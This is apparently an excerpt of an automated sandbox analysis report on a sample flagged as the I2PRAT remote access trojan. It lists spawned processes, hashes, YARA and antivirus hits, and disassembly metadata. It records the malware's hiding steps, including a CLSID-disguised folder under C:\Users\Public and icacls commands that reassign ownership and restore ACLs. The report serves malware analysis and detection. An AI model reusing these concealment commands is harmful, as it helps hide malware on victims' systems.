                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:19
                                                                  Start time:14:26:21
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:20
                                                                  Start time:14:26:21
                                                                  Start date:11/01/2025
                                                                  Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  Imagebase:0x7ff6bfd60000
                                                                  File size:89'088 bytes
                                                                  MD5 hash:BB070CFBD23A7BC6F2A0F8F6D167D207
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_I2PRAT, Description: Yara detected I2PRAT, Source: 00000014.00000002.2556948586.0000013B440BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 70%, ReversingLabs
                                                                  Has exited:true

                                                                  Target ID:21
                                                                  Start time:14:26:21
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\icacls.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
                                                                  Imagebase:0x7ff741d20000
                                                                  File size:39'424 bytes
                                                                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:22
                                                                  Start time:14:26:21
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:23
                                                                  Start time:14:26:21
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\icacls.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
                                                                  Imagebase:0x7ff741d20000
                                                                  File size:39'424 bytes
                                                                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:24
                                                                  Start time:14:26:21
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:27
                                                                  Start time:14:27:15
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                  Imagebase:0x7ff6eef20000
                                                                  File size:55'320 bytes
                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  Target ID:28
                                                                  Start time:14:27:15
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\WerFault.exe -pss -s 436 -p 4124 -ip 4124
                                                                  Imagebase:0x7ff6561e0000
                                                                  File size:570'736 bytes
                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:29
                                                                  Start time:14:27:15
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 4124 -s 1232
                                                                  Imagebase:0x7ff6561e0000
                                                                  File size:570'736 bytes
                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:31
                                                                  Start time:14:27:38
                                                                  Start date:11/01/2025
                                                                  Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  Imagebase:0x7ff6bfd60000
                                                                  File size:89'088 bytes
                                                                  MD5 hash:BB070CFBD23A7BC6F2A0F8F6D167D207
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_I2PRAT, Description: Yara detected I2PRAT, Source: 0000001F.00000002.2934870565.00000201EAE17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Has exited:false

                                                                  Reset < >
                                                                    APIs
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 02EAA053
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 02EAA059
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 02EAA05F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 3668304517-0
                                                                    • Opcode ID: d4e8e88555f2eb12c545b98b90c24c3d39095b307ae36abf8871b6113ed62f51
                                                                    • Instruction ID: 2dee252279134b2edf715247d27d062148e1d4e9ff8acefdb92ef1e007a40152
                                                                    • Opcode Fuzzy Hash: d4e8e88555f2eb12c545b98b90c24c3d39095b307ae36abf8871b6113ed62f51
                                                                    • Instruction Fuzzy Hash: 95B18130958B4C8FDB54EF28C89469EB7E1FFA9304F50A71AE449D7251DB70E481CB41
                                                                    APIs
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 02EAD0EB
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 02EAD0F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 3668304517-0
                                                                    • Opcode ID: c13881684555dfa4367d4d73b1e4ee07c41d0d00dee4c5945f428639c018f28f
                                                                    • Instruction ID: 5ec2ee347bd98024f0c850cc7a3173ed7af3e73f47638f05e6eeddb1cb6de55a
                                                                    • Opcode Fuzzy Hash: c13881684555dfa4367d4d73b1e4ee07c41d0d00dee4c5945f428639c018f28f
                                                                    • Instruction Fuzzy Hash: A0A19231568B4C8BDB14EF2CC8956EA77E2FB99314F50A71AF48AC7164DB30E581CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b5381d9fe7fa622fd0860884433f0d4a55c1a5d5f6020f8b55c1a12f78539a93
                                                                    • Instruction ID: f947b3a2bf9a96d8d82b53ba04a140a401ee21195883960a8498ee3c77307ed0
                                                                    • Opcode Fuzzy Hash: b5381d9fe7fa622fd0860884433f0d4a55c1a5d5f6020f8b55c1a12f78539a93
                                                                    • Instruction Fuzzy Hash: F3A1C331658E0C8FCB58EF18C4956EDB7E2FBA9314F00965AE44EDB150DA70F981CB85
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID: _clrfp
                                                                    • String ID:
                                                                    • API String ID: 3618594692-0
                                                                    • Opcode ID: bb3d50ccaa70714ca57f8e18558dc9f0eacc16d483a426df21245d113d691742
                                                                    • Instruction ID: 0c789c15d6a1d91060884ecd4418371af2a1e8cab5f517c15197d5fe240cb853
                                                                    • Opcode Fuzzy Hash: bb3d50ccaa70714ca57f8e18558dc9f0eacc16d483a426df21245d113d691742
                                                                    • Instruction Fuzzy Hash: 84B17930510A4D8FDB9ADF1CC88AB9677E1FF49308F199599E859CB262C335E852CB01
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c9504ec3498c334db6f4483eaf0aa592e2d3e0a6c7eae909d948189314d3c2b0
                                                                    • Instruction ID: 2bf45b41a03c49cb3038cc8d27423799e2ec81e775c89e2f3ea494213dc8ad15
                                                                    • Opcode Fuzzy Hash: c9504ec3498c334db6f4483eaf0aa592e2d3e0a6c7eae909d948189314d3c2b0
                                                                    • Instruction Fuzzy Hash: 60E1A331958B8C8BC745DF28C8A56FAB3E1FFA9304F40971EE486D7150EB74A644CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
                                                                    • Instruction ID: fa48a5f82509675faa08f19c5d0408ccd347d06fe8fe6592d4b708a126f33637
                                                                    • Opcode Fuzzy Hash: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
                                                                    • Instruction Fuzzy Hash: 8461267195CB5C4FDB29EF6898491BBBBE1EFC4714F00965FE48AC3155DA30A8428AC2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
                                                                    • Instruction ID: 7e95944e481566eb0112e0aa38bc148288ddd21dbb1f91d1460e9e3c9f54d4a1
                                                                    • Opcode Fuzzy Hash: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
                                                                    • Instruction Fuzzy Hash: 2E51F332718E0D8F8B1DEF6CD4986B673D2FBAC315315822EE44ED7265DA70D8868781
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
                                                                    • Instruction ID: a5a33c13a1891abba0d642bed16e602467418df2ee13b56ed2248f121a2a3939
                                                                    • Opcode Fuzzy Hash: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
                                                                    • Instruction Fuzzy Hash: 882186317116054BE70CCE2EC89A575B3D7F7D9209B58D67DD15BCB357C93668038A08
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
                                                                    • Instruction ID: 42de050ba65b1c4712bc7c8f0d2629f7c2ab9af5b23af592a94acf5d99801daf
                                                                    • Opcode Fuzzy Hash: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
                                                                    • Instruction Fuzzy Hash: 0D11E1727118008FDB5CCF3DCDAA66933D6EB89305B48D2BCE51ACB26ADA359803C744
                                                                    APIs
                                                                    • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 02EB0DBF
                                                                      • Part of subcall function 02EB3122: __GetUnwindTryBlock.LIBCMT ref: 02EB3165
                                                                      • Part of subcall function 02EB3122: __SetUnwindTryBlock.LIBVCRUNTIME ref: 02EB318A
                                                                    • Is_bad_exception_allowed.LIBVCRUNTIME ref: 02EB0E97
                                                                    • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 02EB10E5
                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 02EB11F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
                                                                    • Instruction ID: 06b8b4f886a65053df598078333b3390d16a1808ce331a69c1a31b93d4a99961
                                                                    • Opcode Fuzzy Hash: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
                                                                    • Instruction Fuzzy Hash: D2E1CF30958B488FDB16EF68D4957EA77E1FF99314F10A21EE489DB211DB34E481CB82
                                                                    APIs
                                                                    • Is_bad_exception_allowed.LIBVCRUNTIME ref: 02EB13D0
                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 02EB16F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 3523768491-393685449
                                                                    • Opcode ID: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
                                                                    • Instruction ID: ba88b5a776c05a3b7667371a186c55c2b26524a6c8d804c77c380cf8091217a0
                                                                    • Opcode Fuzzy Hash: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
                                                                    • Instruction Fuzzy Hash: 11E1F530858B488FCB16EF68C4956EA77E1FF59324F10925DE489CB652DB30E486CF82
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1740715915-0
                                                                    • Opcode ID: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
                                                                    • Instruction ID: e86d6d4104072a4dccb7f1f5c1f19c4953b666a069650362b64c7f297d7bd60e
                                                                    • Opcode Fuzzy Hash: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
                                                                    • Instruction Fuzzy Hash: 1DC1E430198F5A8F9B2AAF28C0542F7B2D1FF99318B54EA6DD48AC7555DB30F4818BC1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $($2$H$P!`$`
                                                                    • API String ID: 0-2682688576
                                                                    • Opcode ID: 6f338864bc440f2af10c69bb62dcc2234c63ea6672277518ce2d0b7b3d90242a
                                                                    • Instruction ID: 1a21c480a5ba088638866529ed9ebb5ea3c158a3af7f28b8d4a22cff5fc2811e
                                                                    • Opcode Fuzzy Hash: 6f338864bc440f2af10c69bb62dcc2234c63ea6672277518ce2d0b7b3d90242a
                                                                    • Instruction Fuzzy Hash: 9AC1F4B09187988FD7A4DF18C08879ABBE1FB99304F508A6ED8CDCB215DB705589CF46
                                                                    APIs
                                                                    • _CallSETranslator.LIBVCRUNTIME ref: 02EB1A61
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID: CallTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3163161869-2084237596
                                                                    • Opcode ID: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
                                                                    • Instruction ID: 06ddcde68246b2b686df05b4c85103d1d43cdbc6f4268f8c785ba351c223935b
                                                                    • Opcode Fuzzy Hash: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
                                                                    • Instruction Fuzzy Hash: 9FA1B230958B488FCB19EF6CC495AEABBE1FF99318F14965EE449CB121DB30E541CB81
                                                                    APIs
                                                                    • __except_validate_context_record.LIBVCRUNTIME ref: 02EB0095
                                                                    • _IsNonwritableInCurrentImage.LIBCMT ref: 02EB012C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 3242871069-1018135373
                                                                    • Opcode ID: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
                                                                    • Instruction ID: 90dcaf8cd710ce2a6ffea2b9da632dc8663dedef70a43d7221d9a19dd1ea1135
                                                                    • Opcode Fuzzy Hash: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
                                                                    • Instruction Fuzzy Hash: 2561B230648A098BCB2DEE5CD885BB773D1FF54354F10A16DE88AC3256EB30F8958A95
                                                                    APIs
                                                                    • _CallSETranslator.LIBVCRUNTIME ref: 02EB17E1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID: CallTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3163161869-2084237596
                                                                    • Opcode ID: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
                                                                    • Instruction ID: 7c2add6214f68c1dd729618ebc60c0f1f7a50c95b6fde5177f71f01ee14f0187
                                                                    • Opcode Fuzzy Hash: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
                                                                    • Instruction Fuzzy Hash: D871B030518B888FD729EF58D456BEAB7E0FF99318F009A5EE48DC7111DB74A581CB82
                                                                    APIs
                                                                    • __except_validate_context_record.LIBVCRUNTIME ref: 02EB28A0
                                                                    • _CreateFrameInfo.LIBVCRUNTIME ref: 02EB28C9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFrameInfo__except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 2558813199-1018135373
                                                                    • Opcode ID: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                                                                    • Instruction ID: 4f73eadc36bb0091815ebdd57ddd80ea270b98f7100d78331b9d5d89b304bcd7
                                                                    • Opcode Fuzzy Hash: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                                                                    • Instruction Fuzzy Hash: F65150B0558B088FC761EF28D4896AB77E1FF99351F10555EE58DC7221DB30E442CB86

                                                                    Execution Graph

                                                                    Execution Coverage:59.2%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:11
                                                                    Total number of Limit Nodes:1
                                                                    execution_graph 89 3410650 90 3410665 89->90 95 3410620 VirtualAlloc 90->95 92 34106d0 96 34101b0 VirtualAlloc 92->96 95->92 97 341023b VirtualProtect 96->97 99 3410321 VirtualFree 97->99 102 341030c 97->102 100 3410347 VirtualFree VirtualAlloc 99->100 100->102 101 3410531 102->101 103 34104f9 VirtualProtect 102->103 103->102

                                                                    Callgraph

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2935251310.0000000003410000.00000040.00001000.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_3410000_80P.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$AllocFreeProtect
                                                                    • String ID:
                                                                    • API String ID: 267585107-0
                                                                    • Opcode ID: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                                                                    • Instruction ID: ced86964122fab445bd30258253559260316e8cf132382ed2eb8d99a4e47f0b1
                                                                    • Opcode Fuzzy Hash: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                                                                    • Instruction Fuzzy Hash: 16C1B974218A488FD784EF5CC498B5AB7E1FB98305F55486EF48AC7361DBB4E881CB06

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 34 3410620-3410644 VirtualAlloc
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2935251310.0000000003410000.00000040.00001000.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_3410000_80P.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                                                                    • Instruction ID: 42c62d54d1ca80df244572d2250d49a4e48d2af1a4e11cc88891e319d730dc5d
                                                                    • Opcode Fuzzy Hash: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                                                                    • Instruction Fuzzy Hash: C7C08C3060A2004BDB0C6B38D8A9B1B3AE0FB8C300FA0552DF18BC2290C97EC4828786
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1956789957.00007FF65CE51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65CE50000, based on PE: true
                                                                    • Associated: 00000009.00000002.1956663300.00007FF65CE50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.1956917307.00007FF65CE60000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.1956917307.00007FF65D45C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.1957645614.00007FF65D875000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.1957659866.00007FF65D87D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.1957659866.00007FF65D87F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.1957685035.00007FF65D880000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.1957697702.00007FF65D883000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff65ce50000_jvnu3e85o6ls9huft0apy3731vg.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d92b2e36e32e242d3d26627d8420fc34f18325cbf1fffa5b1655a556a0966707
                                                                    • Instruction ID: 325d36d79b1c2d307d3d1dcae3cea65ef4b447b65c424a3f04e24806f93887c3
                                                                    • Opcode Fuzzy Hash: d92b2e36e32e242d3d26627d8420fc34f18325cbf1fffa5b1655a556a0966707
                                                                    • Instruction Fuzzy Hash: 51B01232B0824184E3007F11DC4125C36207B04700F550070C40C77392DE7D90404710

                                                                    Execution Graph

                                                                    Execution Coverage:6.2%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:7.1%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:35
